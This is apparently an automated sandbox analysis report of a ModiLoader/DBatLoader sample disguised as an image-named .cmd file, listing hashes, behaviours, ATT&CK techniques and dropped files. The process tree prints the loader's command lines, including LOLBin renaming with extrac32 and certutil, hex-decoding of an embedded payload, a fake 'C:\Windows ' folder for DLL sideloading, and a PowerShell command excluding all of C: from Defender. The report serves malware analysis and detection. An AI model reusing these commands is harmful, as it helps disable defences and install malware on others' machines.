Analysis

  • max time kernel
    148s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-06-2024 13:36

General

  • Target

    IMG_20240605_187343_JPG.cmd

  • Size

    3.6MB

  • MD5

    77459eb8f65bfbfe7fa5af7966a90391

  • SHA1

    1bc222205955806516b4eb06352fd9d133a656cb

  • SHA256

    43db42b4ba232a67c442de8f05e12d61d8bd1c84061d8f0a73d4bab0f9629cfa

  • SHA512

    b8b3614b06840c28be73dd34578e687db5f9a4e75565bb24c11791b14c33f516cb8e4811d03a19fdf6852aae2a4e1cbf3e3e29c441d86bb1dc57c15bc701118c

  • SSDEEP

    49152:vgk00JywMTAermhoGyBDj1kwXui5zlrT2Da0QhMQ:Y

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • ModiLoader Second Stage 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3504
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\IMG_20240605_187343_JPG.cmd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:388
      • C:\Windows\System32\extrac32.exe
        C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
        3⤵
          PID:740
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4988
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
            4⤵
              PID:5008
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\IMG_20240605_187343_JPG.cmd" "C:\\Users\\Public\\Audio.mp4" 9
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2904
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\IMG_20240605_187343_JPG.cmd" "C:\\Users\\Public\\Audio.mp4" 9
              4⤵
              • Executes dropped EXE
              PID:4844
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4024
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 12
              4⤵
              • Executes dropped EXE
              PID:2768
          • C:\Users\Public\Libraries\Audio.pif
            C:\Users\Public\Libraries\Audio.pif
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4824
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c mkdir "\\?\C:\Windows "
              4⤵
                PID:1656
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c mkdir "\\?\C:\Windows \System32"
                4⤵
                  PID:3372
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c "C:\\Windows \\System32\\cmd.pif"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1684
                  • C:\Windows \System32\cmd.pif
                    "C:\\Windows \\System32\\cmd.pif"
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2288
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd /c start /min powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:932
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:872
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Bhvdpblh.PIF
                  4⤵
                    PID:4988
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                  3⤵
                  • Executes dropped EXE
                  PID:3016
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S
                  3⤵
                  • Executes dropped EXE
                  PID:944
              • C:\Windows\SysWOW64\control.exe
                "C:\Windows\SysWOW64\control.exe"
                2⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2212
                • C:\Windows\SysWOW64\cmd.exe
                  /c del "C:\Users\Public\Libraries\Audio.pif"
                  3⤵
                    PID:2356

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Execution

              Command and Scripting Interpreter

              1
              T1059

              PowerShell

              1
              T1059.001

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              1
              T1112

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_degddcy2.vrm.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Public\Audio.mp4
                Filesize

                2.5MB

                MD5

                0528593d70b9b922ad3cbaf6e717938f

                SHA1

                1d332267fa9b98c4524466eb18c6b92fa9e983eb

                SHA256

                8fcc21231ad08f4f4256441ce064a4d88e39be7fc33aa757d82662f7f43519eb

                SHA512

                bf3596fb53557449bde39968cd9b1c2e5225db016421bdc437756cc0f7b6b247e446fa038cc9a680d06f08fbb0fc6df42bfd7f6af6523850316973228b486759

              • C:\Users\Public\Libraries\Audio.pif
                Filesize

                1.2MB

                MD5

                3c13507701d8b2fe7ee770842d143323

                SHA1

                2ddfdfd72bf05e5db3b692ad9023469ef9123170

                SHA256

                2f37b67330c37adf1314f490bd1a49d0507f51e6c4cfeeb174c4cb9f3df184c8

                SHA512

                1fed83887652b39d6be6dbf6be36d3a25c2ab80996f8f43f0ab5aec1d2dcd1e74223c171c45a7845c6343b13aac90b57273fd3925aa004da90ff873e77fab409

              • C:\Users\Public\alpha.exe
                Filesize

                283KB

                MD5

                8a2122e8162dbef04694b9c3e0b6cdee

                SHA1

                f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                SHA256

                b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                SHA512

                99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

              • C:\Users\Public\kn.exe
                Filesize

                1.6MB

                MD5

                bd8d9943a9b1def98eb83e0fa48796c2

                SHA1

                70e89852f023ab7cde0173eda1208dbb580f1e4f

                SHA256

                8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                SHA512

                95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

              • C:\Windows \System32\cmd.pif
                Filesize

                94KB

                MD5

                869640d0a3f838694ab4dfea9e2f544d

                SHA1

                bdc42b280446ba53624ff23f314aadb861566832

                SHA256

                0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

                SHA512

                6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

              • C:\Windows \System32\netutils.dll
                Filesize

                109KB

                MD5

                3ef9e89c8bf16295c84b8c82bf5e1b50

                SHA1

                45fb8e0cd06da23564712614481265679369fee3

                SHA256

                e0d3d0cf79d7969da536946de8a7395cab39ddfaca7ba7353aa6544d04209b2e

                SHA512

                0d27d4fe85117003830b69575ea02b7ee67601db7d8b2e422f5f9b72735b9b3d15ab8b81b7a9f4f2b14caf1365d0137d9d437932c4640f97c883d3c7bf24a1c1

              • memory/872-217-0x000002319B2F0000-0x000002319B312000-memory.dmp
                Filesize

                136KB

              • memory/4824-58-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-67-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-32-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-31-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-33-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-35-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-39-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-61-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-60-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-91-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-54-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-87-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-57-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-84-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-82-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-77-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-53-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-52-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-70-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-69-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-50-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-49-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-66-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-48-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-64-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-47-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-46-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-45-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-29-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-44-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-65-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-30-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-59-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-43-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-42-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-51-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-41-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-40-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-38-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-37-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-36-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-34-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-90-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-89-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-88-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-86-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-85-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-83-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-81-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-80-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-79-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-78-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-76-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-75-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-74-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-73-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-72-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-71-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-68-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-56-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-28-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-55-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-63-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB

              • memory/4824-62-0x0000000002A70000-0x0000000003A70000-memory.dmp
                Filesize

                16.0MB